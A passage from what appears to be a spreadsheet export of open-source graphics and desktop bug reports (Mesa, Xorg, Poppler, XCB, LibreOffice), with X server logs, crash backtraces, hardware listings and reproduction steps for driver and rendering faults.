        [0] -1  0       0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) Bus 16 non-prefetchable memory range:
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
(II) Bus 16 prefetchable memory range:
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
(II) Host-to-PCI bridge:
(II) Bus 32: bridge is at (32:11:0) (323232) BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 32 I/O range:
        [0] -1  0       0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) Bus 32 non-prefetchable memory range:
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
(II) Bus 32 prefetchable memory range:
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
(--) PCI:*(0:16:0) ATI Technologies Inc Rage 128 Pro Ultra TR rev 0 Mem @ 
0x94000000/26 0x90000000/14 I/O @ 0x0400/8 BIOS @ 0xf1000000/17
(II) Addressable bus resource ranges are
        [0] -1  0       0x00000000 - 0xffffffff (0x0) MX[B]
        [1] -1  0       0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) OS-reported resource ranges:
        [0] -1  0       0xffe00000 - 0xffffffff (0x200000) MX[B](B)
        [1] -1  0       0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
        [2] -1  0       0x000f0000 - 0x000fffff (0x10000) MX[B]
        [3] -1  0       0x000c0000 - 0x000effff (0x30000) MX[B]
        [4] -1  0       0x00000000 - 0x0009ffff (0xa0000) MX[B]
        [5] -1  0       0x0000ffff - 0x0000ffff (0x1) IX[B]
        [6] -1  0       0x00000000 - 0x000000ff (0x100) IX[B]
(II) Active PCI resource ranges:
        [0] -1  0       0xf5200000 - 0xf53fffff (0x200000) MX[B]
        [1] -1  0       0xf5000000 - 0xf5000fff (0x1000) MX[B]
        [2] -1  0       0x80080000 - 0x80080fff (0x1000) MX[B]
        [3] -1  0       0x80081000 - 0x80081fff (0x1000) MX[B]
        [4] -1  0       0x80000000 - 0x8007ffff (0x80000) MX[B]
        [5] -1  0       0xf1000000 - 0xf101ffff (0x20000) MX[B](B)
        [6] -1  0       0x90000000 - 0x90003fff (0x4000) MX[B](B)
        [7] -1  0       0x94000000 - 0x97ffffff (0x4000000) MX[B](B)
        [8] -1  0       0xf0000400 - 0xf00004ff (0x100) IX[B](B)
(II) Active PCI resource ranges after removing overlaps:
        [0] -1  0       0xf5200000 - 0xf53fffff (0x200000) MX[B]
        [1] -1  0       0xf5000000 - 0xf5000fff (0x1000) MX[B]
        [2] -1  0       0x80080000 - 0x80080fff (0x1000) MX[B]
        [3] -1  0       0x80081000 - 0x80081fff (0x1000) MX[B]
        [4] -1  0       0x80000000 - 0x8007ffff (0x80000) MX[B]
        [5] -1  0       0xf1000000 - 0xf101ffff (0x20000) MX[B](B)
        [6] -1  0       0x90000000 - 0x90003fff (0x4000) MX[B](B)
        [7] -1  0       0x94000000 - 0x97ffffff (0x4000000) MX[B](B)
        [8] -1  0       0xf0000400 - 0xf00004ff (0x100) IX[B](B)
(II) OS-reported resource ranges after removing overlaps with PCI:
        [0] -1  0       0xffe00000 - 0xffffffff (0x200000) MX[B](B)
        [1] -1  0       0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
        [2] -1  0       0x000f0000 - 0x000fffff (0x10000) MX[B]
        [3] -1  0       0x000c0000 - 0x000effff (0x30000) MX[B]
        [4] -1  0       0x00000000 - 0x0009ffff (0xa0000) MX[B]
        [5] -1  0       0x0000ffff - 0x0000ffff (0x1) IX[B]
        [6] -1  0       0x00000000 - 0x000000ff (0x100) IX[B]
(II) All system resource ranges:
        [0] -1  0       0xffe00000 - 0xffffffff (0x200000) MX[B](B)
        [1] -1  0       0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
        [2] -1  0       0x000f0000 - 0x000fffff (0x10000) MX[B]
        [3] -1  0       0x000c0000 - 0x000effff (0x30000) MX[B]
        [4] -1  0       0x00000000 - 0x0009ffff (0xa0000) MX[B]
        [5] -1  0       0xf5200000 - 0xf53fffff (0x200000) MX[B]
        [6] -1  0       0xf5000000 - 0xf5000fff (0x1000) MX[B]
        [7] -1  0       0x80080000 - 0x80080fff (0x1000) MX[B]
        [8] -1  0       0x80081000 - 0x80081fff (0x1000) MX[B]
        [9] -1  0       0x80000000 - 0x8007ffff (0x80000) MX[B]
        [10] -1 0       0xf1000000 - 0xf101ffff (0x20000) MX[B](B)
        [11] -1 0       0x90000000 - 0x90003fff (0x4000) MX[B](B)
        [12] -1 0       0x94000000 - 0x97ffffff (0x4000000) MX[B](B)
        [13] -1 0       0x0000ffff - 0x0000ffff (0x1) IX[B]
        [14] -1 0       0x00000000 - 0x000000ff (0x100) IX[B]
        [15] -1 0       0xf0000400 - 0xf00004ff (0x100) IX[B](B)
...
(II) LoadModule: r128
(II) Loading /usr/lib/xorg/modules/drivers/r128_drv.so
(II) Module r128: vendor=X.Org Foundation
        compiled for 7.0.0 module version = 4.0.4
        Module class: X.Org Video Driver
        ABI class: X.Org Video Driver version 0.8
(II) LoadModule: ati
(II) Loading /usr/lib/xorg/modules/drivers/ati_drv.so
(II) Module ati: vendor=X.Org Foundation
        compiled for 7.0.0 module version = 6.5.7
        Module class: X.Org Video Driver
        ABI class: X.Org Video Driver version 0.8
...
(--) Chipset ATI Rage 128 Pro ULTRA TR (AGP) found
...
(II) Loading sub module r128
(II) LoadModule: r128
(II) Reloading /usr/lib/xorg/modules/drivers/r128_drv.so
(WW) ****INVALID IO ALLOCATION**** b: 0xf0000400 e: 0xf00004ff correcting^G
(EE) end of block range 0xefffffff &lt; begin 0xf0000000
(II) window:
        [0] -1  0       0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) resSize:
(II) window fixed:
        [0] -1  0       0x00000000 - 0x0000ffff (0x10000) IX[B]
(II) resource ranges after probing:
        [0] -1  0       0xffe00000 - 0xffffffff (0x200000) MX[B](B)
        [1] -1  0       0x00100000 - 0x3fffffff (0x3ff00000) MX[B]E(B)
        [2] -1  0       0x000f0000 - 0x000fffff (0x10000) MX[B]
        [3] -1  0       0x000c0000 - 0x000effff (0x30000) MX[B]
        [4] -1  0       0x00000000 - 0x0009ffff (0xa0000) MX[B]
        [5] -1  0       0xf5200000 - 0xf53fffff (0x200000) MX[B]
        [6] -1  0       0xf5000000 - 0xf5000fff (0x1000) MX[B]
        [7] -1  0       0x80080000 - 0x80080fff (0x1000) MX[B]
        [8] -1  0       0x80081000 - 0x80081fff (0x1000) MX[B]
        [9] -1  0       0x80000000 - 0x8007ffff (0x80000) MX[B]
        [10] -1 0       0xf1000000 - 0xf101ffff (0x20000) MX[B](B)
        [11] -1 0       0x90000000 - 0x90003fff (0x4000) MX[B](B)
        [12] -1 0       0x94000000 - 0x97ffffff (0x4000000) MX[B](B)
        [13] 0  0       0x000a0000 - 0x000affff (0x10000) MS[B]
        [14] 0  0       0x000b0000 - 0x000b7fff (0x8000) MS[B]
        [15] 0  0       0x000b8000 - 0x000bffff (0x8000) MS[B]
        [16] -1 0       0x00000400 - 0x000004ff (0x100) IX[B](B)
        [17] -1 0       0x0000ffff - 0x0000ffff (0x1) IX[B]
        [18] -1 0       0x00000000 - 0x000000ff (0x100) IX[B]
        [19] 0  0       0xf00003b0 - 0xf00003bb (0xc) IS[B]
        [20] 0  0       0xf00003c0 - 0xf00003df (0x20) IS[B]
...
(II) Setting vga for screen 0.
(II) R128(0): PCI bus 0 card 16 func 0
(**) R128(0): Depth 24 (--) framebuffer bpp 32
(II) R128(0): Pixel depth = 24 bits stored in 4 bytes (32 bpp pixmaps)
(==) R128(0): Default visual is TrueColor
(**) R128(0): Option UseFBDev false
(II) R128(0): VGAAccess option set to FALSE VGA module load skipped
(==) R128(0): RGB weight 888
(II) R128(0): Using 8 bits per RGB (8 bit DAC)
(II) Loading sub module int10
(II) LoadModule: int10
(II) Loading /usr/lib/xorg/modules/libint10.so
(II) Module int10: vendor=X.Org Foundation
        compiled for 7.0.0 module version = 1.0.0
        ABI class: X.Org Video Driver version 0.8
(II) R128(0): initializing int10
(EE) R128(0): V_BIOS address 0x26000 out of range
(--) R128(0): Chipset: ATI Rage 128 Pro ULTRA TR (AGP) (ChipID = 0x5452)
(--) R128(0): Linear framebuffer at 0x94000000
(--) R128(0): MMIO registers at 0x90000000
(--) R128(0): BIOS at 0xf1000000
(--) R128(0): VideoRAM: 16384 kByte (128-bit SDR SGRAM 1:1)
(**) R128(0): Using external CRT for display
(WW) R128(0): Video BIOS not detected in PCI space!
(WW) R128(0): Attempting to read Video BIOS from legacy ISA space!
(WW) R128(0): Video BIOS not found!
(II) R128(0): Primary Display == Type 3
(WW) R128(0): Can't determine panel dimensions and none specified.
        Disabling programming of FP registers.
(II) R128(0): PLL parameters: rf=2950 rd=59 min=12500 max=25000 xclk=13000
...
(EE) R128(0): R128CCEWaitForIdle: (DEBUG) CCE idle took i = 1025
(EE) R128(0): Idle timed out resetting engine...
(EE) R128(0): R128CCEWaitForIdle: (DEBUG) CCE idle took i = 1025
(EE) R128(0): Idle timed out resetting engine...
(EE) R128(0): R128CCEWaitForIdle: (DEBUG) CCE idle took i = 1025
(EE) R128(0): Idle timed out resetting engine...
cat /proc/cpuinfo :
processor       : 0
cpu             : 750CXe
temperature     : 4 C (uncalibrated)
clock           : 500.000000MHz
revision        : 50.20 (pvr 0008 3214)
bogomips        : 49.79
timebase        : 24960000
machine         : PowerMac41
motherboard     : PowerMac41 MacRISC2 MacRISC Power Macintosh
detected as     : 256 (iMac Flower Power)
pmac flags      : 00000010
L2 cache        : 256K unified
pmac-generation : NewWorld</t>
  </si>
  <si>
    <t>spam1</t>
  </si>
  <si>
    <t>POPPLER-4649</t>
  </si>
  <si>
    <t>crash on click on input field in PDF</t>
  </si>
  <si>
    <t>= Transfering this bug from GNOME Bugzilla:
http://bugzilla.gnome.org/show_bug.cgi?id=316907 =
Distribution: Debian testing/unstable
Package: evince
Severity: critical
Version: GNOME2.10.2 0.4.x
Gnome-Distributor: Debian
Synopsis: Crashes when trying to fill in text
Bugzilla-Product: evince
Bugzilla-Component: general
Bugzilla-Version: 0.4.x
BugBuddy-GnomeVersion: 2.0 (2.10.1)
Description:
Description of the crash:
My credit card company sends me statements. There's a little text box
for me to fill in for how much I'm paying on my bill. When I tried to
click there evince crashed. The PDF is from Chase FYI.
Steps to reproduce the crash:
1. Open PDF from CC company
2. Try to fill in Amount Enclosed
3. Crash!
Expected Results:
CC company receives money and stops hounding me for more.
How often does this happen?
Very rarely I'm poor.
Additional Information:
Even though they say I need Adobe Acrobat Reader 6.1 can I use this as
an excuse for not paying my bill and get some kind of deference? -)
Debugging Information:
Backtrace was generated from '/usr/bin/evince'
(no debugging symbols found)
Using host libthread_db library /lib/tls/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000'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27438400 (LWP 27407)]
[New Thread -1229841488 (LWP 27408)]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0xb7135b41 in waitpid () from /lib/tls/libc.so.6
#0  0xb7135b41 in waitpid () from /lib/tls/libc.so.6
#1  0xb7f57ee3 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0xb754c634 in CairoFont::CairoFont () from /usr/lib/libpoppler.so.0
#4  0xb754ccf0 in CairoFontEngine::getFont () from
/usr/lib/libpoppler.so.0
#5  0xb754e93f in CairoOutputDev::updateFont () from
/usr/lib/libpoppler.so.0
#6  0xb75b9714 in TextSelectionPainter::visitWord ()
   from /usr/lib/libpoppler.so.0
#7  0xb75b9894 in TextWord::visitSelection () from
/usr/lib/libpoppler.so.0
#8  0xb75b9b3c in TextLine::visitSelection () from
/usr/lib/libpoppler.so.0
#9  0xb75bf55a in TextBlock::visitSelection () from
/usr/lib/libpoppler.so.0
#10 0xb75bf766 in TextPage::visitSelection () from
/usr/lib/libpoppler.so.0
#11 0xb75c0e28 in TextPage::drawSelection () from
/usr/lib/libpoppler.so.0
#12 0xb75c0e89 in TextOutputDev::drawSelection ()
   from /usr/lib/libpoppler.so.0
#13 0xb771334f in poppler_page_render_selection ()
   from /usr/lib/libpoppler-glib.so.0
#14 0x0808a2e7 in pdf_selection_render_selection ()
#15 0x08087e54 in ev_selection_render_selection ()
#16 0x08067694 in ev_pixbuf_cache_get_selection_pixbuf ()
#17 0x0806dec2 in ev_view_rotate_right ()
#18 0xb727c931 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
#19 0xb727a3f1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#20 0xb727d647 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
#21 0xb727db98 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#22 0xb79de989 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x08079b32 in main ()
Thread 2 (Thread -1229841488 (LWP 27408)):
#0  0xb7084b61 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7182a8d in pthread_cond_wait () from /lib/tls/libc.so.6
No symbol table info available.
#2  0x08060f94 in ev_document_types_add_filters ()
No symbol table info available.
#3  0xb7297b65 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7082ccd in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb7175b0e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1227438400 (LWP 27407)):
#0  0xb7135b41 in waitpid () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb7f57ee3 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0xb754c634 in CairoFont::CairoFont () from /usr/lib/libpoppler.so.0
No symbol table info available.
#4  0xb754ccf0 in CairoFontEngine::getFont () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#5  0xb754e93f in CairoOutputDev::updateFont () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#6  0xb75b9714 in TextSelectionPainter::visitWord ()
   from /usr/lib/libpoppler.so.0
No symbol table info available.
#7  0xb75b9894 in TextWord::visitSelection () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#8  0xb75b9b3c in TextLine::visitSelection () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#9  0xb75bf55a in TextBlock::visitSelection () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#10 0xb75bf766 in TextPage::visitSelection () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#11 0xb75c0e28 in TextPage::drawSelection () from
/usr/lib/libpoppler.so.0
No symbol table info available.
#12 0xb75c0e89 in TextOutputDev::drawSelection ()
   from /usr/lib/libpoppler.so.0
No symbol table info available.
#13 0xb771334f in poppler_page_render_selection ()
   from /usr/lib/libpoppler-glib.so.0
No symbol table info available.
#14 0x0808a2e7 in pdf_selection_render_selection ()
No symbol table info available.
#15 0x08087e54 in ev_selection_render_selection ()
No symbol table info available.
#16 0x08067694 in ev_pixbuf_cache_get_selection_pixbuf ()
No symbol table info available.
#17 0x0806dec2 in ev_view_rotate_right ()
No symbol table info available.
#18 0xb727c931 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0xb727a3f1 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0xb727d647 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#21 0xb727db98 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#22 0xb79de989 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x08079b32 in main ()
No symbol table info available.
#0  0xb7135b41 in waitpid () from /lib/tls/libc.so.6</t>
  </si>
  <si>
    <t>gnome</t>
  </si>
  <si>
    <t>MESA-34096</t>
  </si>
  <si>
    <t>r300: Cannot get a relocation in radeon_drm_cs_write_reloc.</t>
  </si>
  <si>
    <t>Created attachment 43168
more dmesg output
When starting the game Minecraft I'm getting these messages in the terminal:
radeon: The kernel rejected CS see dmesg for more information.
r300: Cannot get a relocation in radeon_drm_cs_write_reloc.
dmesg:
[  527.282839] [drm:r100_packet3_load_vbpntr] *ERROR* No reloc for packet3 47
[  527.282841] [drm] ib[13751]=0xC0052F00
[  527.282842] [drm] ib[13752]=0x00000023
[  527.282843] [drm] ib[13753]=0x08010803
[  527.282844] [drm] ib[13754]=0x000EA840
[  527.282845] [drm] ib[13755]=0x000EA858
[  527.282846] [drm] ib[13756]=0x00000802
[  527.282847] [drm] ib[13757]=0x000EA84C
[  527.282849] [drm:radeon_cs_ioctl] *ERROR* Invalid command stream !
If needed I will try and bisect when I have more time.
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: RV570
-- Model: Asus EAX1950Pro 256MB
-- Display connector: DVI
-- xf86-video-ati: 6.13.2
-- xserver: 1.9.4
-- mesa: 04c5cc5b8bec1f34f2405b08fd0d9ed6bd70ea61
-- drm: 2.4.23
-- kernel: 2.6.37</t>
  </si>
  <si>
    <t>MESA-6731</t>
  </si>
  <si>
    <t>Please create an account for me.
Tilman Sauerbeck
tilman@code-monkey.de
Preferred account name is 'tilman'.
Thanks.</t>
  </si>
  <si>
    <t>LIBREOFFICE-71347</t>
  </si>
  <si>
    <t>EDITING: Pasting data from smile.com causes screen issue</t>
  </si>
  <si>
    <t>Created attachment 88824
screenshot showing expanded rows with data and lower rows that have not been redrawn
Pasting in financial data coppied from smile.com causes the lines not to match up on screen
Steps to reproduce:
1. (assuming you have a smile.com bank account with some data)
2. Open a statement in smile.com
3. Highlight several rows of data and CTRL-C to copy
4. Open LibreOffice Calc
5. Click on A1
6. Press CTRL-V to paste
Current behavior:
The rows pasted in are a different height than the current rows so they take up more room however the rows that haven't been pasted into don't move down. They are only redrawn on a page down/page up.
Expected behavior:
The rows below those that have expanded should move down.
Operating System: Windows 7
Version: unspecified</t>
  </si>
  <si>
    <t>tobydjones</t>
  </si>
  <si>
    <t>DRI-25284</t>
  </si>
  <si>
    <t>[915GM] random flickering when using metacity-compositor</t>
  </si>
  <si>
    <t>For several months I've seen random flickering on this laptop. I think this started with the switch from EXA to UXA. Now I found a way to reproduce it:
1.) Make sure you are using metacity as wm:
metacity --replace
2.) Make sure you are using compositing:
gconf-editor /apps/metacity/general/compositing_manager
3.) Run a gnome-terminal
4.) Run glxgears
5.) Move the gnome-terminal window so it partly covers the glxgears window.
(Also after trying these steps and toggling compositing in metacity from compositing to non-compositing and back to compositing I've not been able to reproduce it this way anymore so maybe you need run metacity with compositing as your default wm right from the login)
The flickering should start now and stop as soon as you move the window away again.
As I don't have a camera to capture the flickering I'll try to describe it:
It looks like the whole screen is shifted randomly up and down (not left or right). The cursor gets shifted along with shifted image (different from another flickering issue that got introduced in the 2.6.32 kernel development cycle in which the cursor seems to stay at the same position but I'm not absolutely sure about that since I haven't seen it this often).
Computer:
Thinkpad R52 1858 69G
lspci:
00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 03)
00:02.0 VGA compatible controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03)
00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03)
00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03)
00:1c.2 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 3 (rev 03)
00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03)
00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03)
00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03)
00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03)
00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d3)
00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 03)
00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 03)
00:1f.2 IDE interface: Intel Corporation 82801FBM (ICH6M) SATA Controller (rev 03)
00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03)
02:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751M Gigabit Ethernet PCI Express (rev 11)
04:00.0 CardBus bridge: Texas Instruments PCI4510 PC card Cardbus Controller (rev 03)
04:00.1 FireWire (IEEE 1394): Texas Instruments PCI4510 IEEE-1394 Controller (rev 01)
04:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG [Calexico2] Network Connection (rev 05)
Distro:
Ubuntu 10.4 + Xorg edgers repository ( https://launchpad.net/~xorg-edgers/+archive/ppa/+packages?field.name_filter=&amp;field.status_filter=published&amp;field.series_filter=lucid )
xserver-xorg-video-intel:
2:2.9.0+git20091112.dbb68168-0ubuntu0sarvatt
libdrm-intel1:
2.4.15+git20091119.b4312b63-0ubuntu0tormod
xserver-xorg-core:
2:1.7.99.2~git20091111.b5aa2e0a-0ubuntu0sarvatt8
libx11-6:
2:1.3.2~git20091111.54c64267-0ubuntu0sarvatt
linux-image-2.6.32-5-generic:
2.6.32-5.6
(2.6.32-rc8)
mesa:
7.8.0~git20091124.11dce740-0ubuntu0tormod</t>
  </si>
  <si>
    <t>sebastian-keller</t>
  </si>
  <si>
    <t>XCB-9112</t>
  </si>
  <si>
    <t>Define pthread stub functions when needed</t>
  </si>
  <si>
    <t>Not every platform defines all the weak no-op pthread stubs we use. Diego
'Flameeyes' PettenÃ² has been working on a patch I'm opening this bug to help us
not forget about it.
The mailing list threads start with
http://lists.freedesktop.org/archives/xcb/2006-November/002230.html
http://lists.freedesktop.org/archives/xcb/2006-November/002260.html
http://lists.freedesktop.org/archives/xcb/2006-November/002311.html
though of course Pipermail loses on GPG-signed mail as usual.</t>
  </si>
  <si>
    <t>MESA-101885</t>
  </si>
  <si>
    <t>[skl] Kwin crashing</t>
  </si>
  <si>
    <t>Application: KWin (kwin_x11) signal: Segmentation fault
Using host libthread_db library /lib64/libthread_db.so.1.
[Current thread is 1 (Thread 0x7f295698ed00 (LWP 12319))]
Thread 6 (Thread 0x7f294cbfd700 (LWP 1393)):
#0  0x00007f295de1893a in ppoll () from /lib64/libc.so.6
#1  0x00007f295ca7a2a5 in qt_safe_poll(pollfd* unsigned long timespec const*) () from /usr/lib64/libQt5Core.so.5
#2  0x00007f295ca7b54d in QEventDispatcherUNIX::processEvents(QFlags) () from /usr/lib64/libQt5Core.so.5
#3  0x00007f295ca2bb3a in QEventLoop::exec(QFlags) () from /usr/lib64/libQt5Core.so.5
#4  0x00007f295c883d0a in QThread::exec() () from /usr/lib64/libQt5Core.so.5
#5  0x00007f295c887fa5 in ?? () from /usr/lib64/libQt5Core.so.5
#6  0x00007f295d7e6334 in start_thread () from /lib64/libpthread.so.0
#7  0x00007f295de21c8f in clone () from /lib64/libc.so.6
Thread 5 (Thread 0x7f293bfff700 (LWP 12346)):
#0  0x00007f295d7ebf3f in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0
#1  0x00007f295c3813e4 in ?? () from /usr/lib64/libQt5Script.so.5
#2  0x00007f295c381429 in ?? () from /usr/lib64/libQt5Script.so.5
#3  0x00007f295d7e6334 in start_thread () from /lib64/libpthread.so.0
#4  0x00007f295de21c8f in clone () from /lib64/libc.so.6
Thread 4 (Thread 0x7f294f5ce700 (LWP 12341)):
#0  0x00007f295c88083c in QMutex::lock() () from /usr/lib64/libQt5Core.so.5
#1  0x00007f295ca2f594 in QCoreApplicationPrivate::sendPostedEvents(QObject* int QThreadData*) () from /usr/lib64/libQt5Core.so.5
#2  0x00007f295ca7b3da in QEventDispatcherUNIX::processEvents(QFlags) () from /usr/lib64/libQt5Core.so.5
#3  0x00007f295ca2bb3a in QEventLoop::exec(QFlags) () from /usr/lib64/libQt5Core.so.5
#4  0x00007f295c883d0a in QThread::exec() () from /usr/lib64/libQt5Core.so.5
#5  0x00007f295b71af65 in ?? () from /usr/lib64/libQt5Qml.so.5
#6  0x00007f295c887fa5 in ?? () from /usr/lib64/libQt5Core.so.5
#7  0x00007f295d7e6334 in start_thread () from /lib64/libpthread.so.0
#8  0x00007f295de21c8f in clone () from /lib64/libc.so.6
Thread 3 (Thread 0x7f2955af5700 (LWP 12327)):
#0  0x00007f295ca7b9cb in ?? () from /usr/lib64/libQt5Core.so.5
#1  0x00007f295ca7b468 in QEventDispatcherUNIX::processEvents(QFlags) () from /usr/lib64/libQt5Core.so.5
#2  0x00007f295ca2bb3a in QEventLoop::exec(QFlags) () from /usr/lib64/libQt5Core.so.5
#3  0x00007f295c883d0a in QThread::exec() () from /usr/lib64/libQt5Core.so.5
#4  0x00007f295b2d25f5 in ?? () from /usr/lib64/libQt5DBus.so.5
#5  0x00007f295c887fa5 in ?? () from /usr/lib64/libQt5Core.so.5
#6  0x00007f295d7e6334 in start_thread () from /lib64/libpthread.so.0
#7  0x00007f295de21c8f in clone () from /lib64/libc.so.6
Thread 2 (Thread 0x7f2956652700 (LWP 12326)):
#0  0x00007f295de1888d in poll () from /lib64/libc.so.6
#1  0x00007f295e1cb127 in ?? () from /usr/lib64/libxcb.so.1
#2  0x00007f295e1ccf1a in xcb_wait_for_event () from /usr/lib64/libxcb.so.1
#3  0x00007f29566cfbe9 in ?? () from /usr/lib64/libQt5XcbQpa.so.5
#4  0x00007f295c887fa5 in ?? () from /usr/lib64/libQt5Core.so.5
#5  0x00007f295d7e6334 in start_thread () from /lib64/libpthread.so.0
#6  0x00007f295de21c8f in clone () from /lib64/libc.so.6
Thread 1 (Thread 0x7f295698ed00 (LWP 12319)):
[KCrash Handler]
#6  0x00007f294cfdb534 in isl_gen5_emit_depth_stencil_hiz_s (dev=0x0 batch=0x1344830 info=0x1) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/intel/isl/isl_emit_depth_stencil.c:67
#7  0x000000000107d350 in ?? ()
#8  0x00007f295cc7f1b9 in ?? () from /usr/lib64/libQt5Core.so.5
#9  0x00007f295dc20642 in KWin::AbstractEglTexture::~AbstractEglTexture() () from /usr/lib64/libkwin.so.5
#10 0x00007f2955dc86c3 in ?? () from /usr/lib64/qt5/plugins/org.kde.kwin.platforms/KWinX11Platform.so
#11 0x00007f295dba3699 in KWin::SceneOpenGL::Texture::~Texture() () from /usr/lib64/libkwin.so.5
#12 0x00007f295dba36cd in ?? () from /usr/lib64/libkwin.so.5
#13 0x00007f295dba36e9 in ?? () from /usr/lib64/libkwin.so.5
#14 0x00007f295dba6263 in ?? () from /usr/lib64/libkwin.so.5
#15 0x00007f295db91e96 in KWin::Scene::windowDeleted(KWin::Deleted*) () from /usr/lib64/libkwin.so.5
#16 0x00007f295ca559f7 in QMetaObject::activate(QObject* int int void**) () from /usr/lib64/libQt5Core.so.5
Backtrace stopped: previous frame inner to this frame (corrupt stack?)</t>
  </si>
  <si>
    <t>MESA-27635</t>
  </si>
  <si>
    <t>[page-flipping] 3D games hang with error Couldn't reference dri2 back buffer</t>
  </si>
  <si>
    <t>After the upgrade to the latest 2010Q1 recommended packages many 3D games like tremulous and worldofpadman stop working.
In particular tremulous hangs (I need to kill it) with this error:
Couldn't reference dri2 back buffer handle 0x00000004: No such file or directory
openarena works well
System environment: 
-- xf86-video-intel: 2.11.0
-- xserver: xorg-1.8.0
-- mesa: 7.8.1
-- libdrm: 2.4.20
-- kernel: 2.6.33
-- Linux distribution: Gentoo/Linux
-- Machine or mobo model: Dell Latitude D510</t>
  </si>
  <si>
    <t>mrfree</t>
  </si>
  <si>
    <t>XORG-30808</t>
  </si>
  <si>
    <t>Typo in Git-commit 4083197a44d1a1a05d33654b3c7d6e96d7472fe7</t>
  </si>
  <si>
    <t>Created attachment 39390
Small patch to correct typo in Git-commit 4083197a44d1a1a05d33654b3c7d6e96d7472fe7
Hi
The current git-code has a small typo which makes hardware-accelerated OpenGL on 8xx-based chipsets impossible :
- info.driverName = IS_I965G(intel) ? i965 : i915
+ info.driverName = IS_GEN3(intel) ? i915 : i965
The order of the names was changed and now the module i965_dri.so is loaded for 8xx-based chipsets and i915_dri.so for 9xx based and newer chipsets.
Greetings
Stefan</t>
  </si>
  <si>
    <t>XORG-3369</t>
  </si>
  <si>
    <t>RADEON doesn't unblank DPMS on shutdown</t>
  </si>
  <si>
    <t>The Radeon chipset exhibits a strange behavior on shutdown: 
- When the DPMS registers were programmed such that the screen was blanked at 
  startup the screen remains blank after the server is shut down - no matter what   
  the state was while X was running.
- When the text console was not blank prior to the start of X but X was in a DPMS  
  power save mode when it was shut down the screen remains blank in console mode.
This exhibits two problems:
- Mode pragramming seems to be 'asymetric'
- DPMS powersave state isn't disabled during shutdown.
The patch that is going to be attached does two things:
1. It fixes the asymetry in register programming.
2. It disables any power save state prior to server shutdown regardless of the
   text console state.
The second step may be debateable as we don't restore DPMS to the state it was
in before X was started on the other hand a visible text console seems to be
what most people want.</t>
  </si>
  <si>
    <t>MESA-39193</t>
  </si>
  <si>
    <t>[llvmpipe and r600g] glCheckFramebufferStatusEXT segfaults in Gallium when checking status on a framebuffer bound to a texture that's bound to a pixmap</t>
  </si>
  <si>
    <t>Created attachment 49039
Test program demonstrating the crash
